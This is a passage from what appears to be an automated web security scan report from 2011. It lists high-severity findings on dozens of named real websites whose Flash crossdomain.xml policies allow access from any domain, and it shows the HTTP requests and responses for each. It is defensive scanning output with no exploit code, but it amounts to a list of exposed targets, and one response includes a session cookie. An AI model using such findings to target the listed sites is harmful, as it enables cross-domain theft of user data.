Confidence:   Certain
Host:   http://www.mix961.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mix961.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 03 Mar 2010 20:22:57 GMT
Content-Type: application/xml
Content-Length: 350
X-Varnish: 3192831855
X-Cache-Server: varnish04
Expires: Wed, 04 May 2011 04:13:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 04 May 2011 04:13:37 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>

...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.79. http://www.mofuse.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mofuse.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mofuse.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:40:23 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Wed, 09 Mar 2011 23:32:08 GMT
ETag: "28f86b6-64-49e1523256e00"
Accept-Ranges: bytes
Content-Length: 100
Connection: close
Content-Type: application/xml

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.80. http://www.mountainrailwv.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mountainrailwv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mountainrailwv.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:39:01 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sun, 25 Apr 2010 17:22:40 GMT
ETag: "110c367-cb-48512e84b5800"
Accept-Ranges: bytes
Content-Length: 203
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

   <allow-access-from domain="*" />

</cross-domain-poli
...[SNIP]...

6.81. http://www.moxieteenz.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.moxieteenz.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.moxieteenz.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:27:50 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Mon, 03 Jan 2011 23:16:03 GMT
ETag: "5e1add-137-498f955f152c0"
Accept-Ranges: bytes
Content-Length: 311
Connection: close
Content-Type: application/xml
Set-Cookie: stickysession=brweb03; path=/
Cache-control: private

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*" />
...[SNIP]...

6.82. http://www.myfoxlubbock.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfoxlubbock.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.myfoxlubbock.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:17:21 GMT
Server: PWS/1.7.2.1
X-Px: ms iad-agg-n20 ( iad-agg-n7), ms iad-agg-n7 ( origin)
ETag: "0b66c58755c71:0"
Cache-Control: max-age=120
Expires: Wed, 04 May 2011 01:19:22 GMT
Age: 0
Content-Length: 121
Content-Type: text/xml
Last-Modified: Tue, 20 Feb 2007 15:54:04 GMT
Connection: close

<?xml version="1.0" encoding="utf-8" ?>
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

6.83. http://www.n9negroup.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.n9negroup.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.n9negroup.com

Response

HTTP/1.1 200 OK
Content-Length: 202
Content-Type: text/xml
Content-Location: http://www.n9negroup.com/crossdomain.xml
Last-Modified: Fri, 14 Mar 2008 09:10:08 GMT
Accept-Ranges: bytes
ETag: "508b6133b385c81:494c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 04:10:08 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

6.84. http://www.needstosell.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.needstosell.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.needstosell.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:27:44 GMT
Server: Apache/2.2.4 (Fedora)
Vary: Host
Last-Modified: Tue, 05 Jan 2010 01:09:47 GMT
ETag: "1bb1326-8d-7e72ccc0"
Accept-Ranges: bytes
Content-Length: 141
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="iso-8859-1"?>
<cross-domain-policy>
<allow-access-from domain="*" to-ports="*" />
</cross-domain-policy>

6.85. http://www.netscrap.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.netscrap.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.netscrap.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:58:34 GMT
Content-Type: text/xml
Accept-Ranges: bytes
Last-Modified: Wed, 22 Oct 2008 21:10:41 GMT
ETag: "10f2aea38a34c91:118c"
Content-Length: 104

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.86. http://www.nevershoutnever.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nevershoutnever.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.nevershoutnever.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:10:12 GMT
Server: Apache
Vary: Host
Last-Modified: Wed, 29 Oct 2008 18:27:57 GMT
Accept-Ranges: bytes
Content-Length: 200
Cache-Control: max-age=1209600
Expires: Wed, 18 May 2011 02:10:12 GMT
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

6.87. http://www.newschannel34.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newschannel34.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.newschannel34.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:21:54 GMT
Server: PWS/1.7.2.1
X-Px: ht iad-agg-n34.panthercdn.com
ETag: "3b718a58755c71:0"
Cache-Control: max-age=120
Expires: Wed, 04 May 2011 03:23:22 GMT
Age: 32
Content-Length: 121
Content-Type: text/xml
Last-Modified: Tue, 20 Feb 2007 15:54:04 GMT
Connection: close

<?xml version="1.0" encoding="utf-8" ?>
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

6.88. http://www.nextbus.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextbus.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.nextbus.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:29:23 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.7m DAV/2 mod_jk/1.2.30
Last-Modified: Mon, 12 Apr 2010 23:30:53 GMT
ETag: "18280d6-1c3-8933e540"
Accept-Ranges: bytes
Content-Length: 451
Connection: close
Content-Type: application/xml
Set-Cookie: Coyote-2-d0b8d6f5=c0a80a64:0; path=/

<?xml version="1.0"?>
<!-- This ifile isi needed by Adobe based (such as Flash based) clients
so that the Flash or such source files can come through one deomain
but the data through the www
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.89. http://www.nfb.ca/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nfb.ca
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.nfb.ca

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:38:33 GMT
Server: Apache
Content-Length: 318
Content-Language: en
Expires: Wed, 04 May 2011 02:44:08 GMT
Vary: Accept-Language,Cookie,Accept-Encoding,User-Agent
Last-Modified: Wed, 04 May 2011 02:34:08 GMT
ETag: "52b0e374b710fc4e4f91cb3637581129"
Cache-Control: max-age=600
Set-Cookie: sessionid=84be5739a91521b727184ea919f48d14; expires=Wed, 18-May-2011 02:38:33 GMT; Max-Age=1209600; Path=/
Connection: close
Content-Type: text/html; charset=utf-8
Set-Cookie: NFBSERV=tube2; path=/
Cache-control: private

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

6.90. http://www.ntv.ru/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ntv.ru
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ntv.ru

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 04 May 2011 04:03:18 GMT
Content-Type: text/xml
Content-Length: 213
Last-Modified: Wed, 25 Feb 2009 14:04:18 GMT
Connection: close
Expires: Wed, 04 May 2011 05:03:18 GMT
Cache-Control: max-age=3600
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" ports="*"/>
</cross-d
...[SNIP]...

6.91. http://www.officialsanctuary.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.officialsanctuary.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.officialsanctuary.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:01:05 GMT
Server: Apache
Last-Modified: Tue, 18 May 2010 13:22:09 GMT
ETag: "10a83a-d4-486de3a7d6240"
Accept-Ranges: bytes
Content-Length: 212
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" to-ports="*"/>
</cross-dom
...[SNIP]...

6.92. http://www.openfilm.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.openfilm.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and uses a wildcard to specify allowed domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.openfilm.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Wed, 04 May 2011 03:30:17 GMT
Content-Type: text/xml; charset=utf-8
Content-Length: 228
Last-Modified: Wed, 09 Feb 2011 12:46:55 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*"/>
<allow-access-from domain="*.openfilm.com"/>
<allow-http-request-headers-from domain="*" headers="*" secure="false
...[SNIP]...

6.93. http://www.ovm.org/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ovm.org
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ovm.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:01:10 GMT
Server: Apache
Last-Modified: Tue, 04 Aug 2009 17:21:26 GMT
ETag: "31a8019-d6-1dc73180"
Accept-Ranges: bytes
Content-Length: 214
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" secure="false" />
</cross-
...[SNIP]...

6.94. http://www.percyjacksonbooks.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.percyjacksonbooks.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.percyjacksonbooks.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:00:26 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.14 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
Last-Modified: Tue, 05 May 2009 16:39:30 GMT
ETag: "70788-d7-4692cec40f480"
Accept-Ranges: bytes
Content-Length: 215
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross
...[SNIP]...

6.95. http://www.performgroup.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.performgroup.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.performgroup.com

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Wed, 04 May 2011 04:15:03 GMT
Last-modified: Wed, 04 May 2011 04:10:58 GMT
Cache-control: max-age=600
Content-length: 322
Content-type: text/xml
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-on
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

6.96. http://www.phoneofvoip.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phoneofvoip.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.phoneofvoip.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:50:55 GMT
Server: Apache
Last-Modified: Thu, 17 Jun 2010 15:03:44 GMT
ETag: "130094-68-4893b2504f400"
Accept-Ranges: bytes
Content-Length: 104
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.97. http://www.photofunia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.photofunia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.photofunia.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.37
Date: Wed, 04 May 2011 02:33:19 GMT
Content-Type: text/xml
Content-Length: 192
Last-Modified: Fri, 09 Apr 2010 07:27:42 GMT
Connection: close
Accept-Ranges: bytes

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*" />
   <allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

6.98. http://www.pirelli.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pirelli.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.pirelli.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:02:49 GMT
Server: Apache/1.3.34 (Debian)
Last-Modified: Thu, 14 Feb 2008 17:17:08 GMT
Accept-Ranges: bytes
Content-Length: 203
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

6.99. http://www.pratttribune.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pratttribune.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.pratttribune.com

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 01:55:34 GMT
Server: zope.server.http (WSGI-HTTP)
X-Powered-By: Zope (www.zope.org), Python (www.python.org)
Content-Length: 200
Content-Type: text/html;charset=utf-8
X-Cache: MISS from parent3.ghm.zope.net
X-Cache: MISS from cache6.ghm.zope.net
Via: 1.0 parent3.ghm.zope.net:80 (squid/2.7.STABLE9), 1.0 cache6.ghm.zope.net:80 (squid)
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.100. http://www.primusville.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.primusville.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.primusville.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:03:17 GMT
Server: Apache/2.0.54 (Fedora)
Last-Modified: Tue, 03 Aug 2010 20:46:36 GMT
ETag: "230050-13e-69bf6300"
Accept-Ranges: bytes
Content-Length: 318
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy>
<allow-access-from domain="*"/>
<allow-access-from to-ports="443" secure="false" domain="app.topspin.net"/>
<allow-access-from secure="false" domain="*.macromedia.com"/>
<allow-access-from secure="false" domain="*.adobe.com"/>
...[SNIP]...

6.101. http://www.puuko.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.puuko.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.puuko.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:21:33 GMT
Server: Apache
Last-Modified: Thu, 19 Mar 2009 13:52:34 GMT
ETag: "350d8c8-8d-49c24e22"
Accept-Ranges: bytes
Content-Length: 141
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.*" />
<allow-access-from domain="*" />
</cross-domain-policy>

6.102. http://www.quakersteakandlube.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.quakersteakandlube.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.quakersteakandlube.com

Response

HTTP/1.1 200 OK
Content-Length: 202
Content-Type: text/xml
Content-Location: http://www.quakersteakandlube.com/crossdomain.xml
Last-Modified: Tue, 08 Mar 2011 22:30:14 GMT
Accept-Ranges: bytes
ETag: "e7419d64e0ddcb1:1a6749"
Server: Microsoft-IIS/6.0
Hosted-With: GearHost Inc. (www.gearhost.com)
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:02:36 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

6.103. http://www.radiofarda.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.radiofarda.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.radiofarda.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Wed, 04 Jun 2008 14:47:18 GMT
Accept-Ranges: bytes
ETag: "1C8C651E2D01F00"
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-UA-Compatible: IE=edge
Content-Length: 310
Cache-Control: public, max-age=0
Expires: Wed, 04 May 2011 03:47:02 GMT
Date: Wed, 04 May 2011 03:47:02 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
   <site-control permitte
...[SNIP]...

6.104. http://www.realore.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.realore.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.realore.com

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 04 May 2011 01:13:27 GMT
Content-Type: text/xml
Content-Length: 231
Last-Modified: Tue, 31 Aug 2010 13:36:25 GMT
Connection: close
Expires: Wed, 18 May 2011 01:13:27 GMT
Cache-Control: max-age=1209600
Accept-Ranges: bytes

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*" />
   <allow-http-request-headers-from domain="*" heade
...[SNIP]...

6.105. http://www.ringtonekey.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ringtonekey.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ringtonekey.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:08:59 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Fri, 05 Mar 2010 07:15:00 GMT
ETag: "6fc96a1-68-481087933c500"
Accept-Ranges: bytes
Content-Length: 104
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.106. http://www.sanmanuel.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sanmanuel.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.sanmanuel.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:09:03 GMT
Server: Apache/2.2.17 (Win32) mod_ssl/2.2.17 OpenSSL/0.9.8o PHP/5.3.3
Last-Modified: Mon, 10 Jan 2011 23:43:31 GMT
ETag: "200000000676f-101-4998689123ab7"
Accept-Ranges: bytes
Content-Length: 257
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy>
<allow-access-from domain="*.sanmanuel.com" />
<allow-access-from domain="sanmanuel.com" />
<allow-access-from domain="www.sanmanuel.com" /
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

6.107. http://www.semilo.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.semilo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

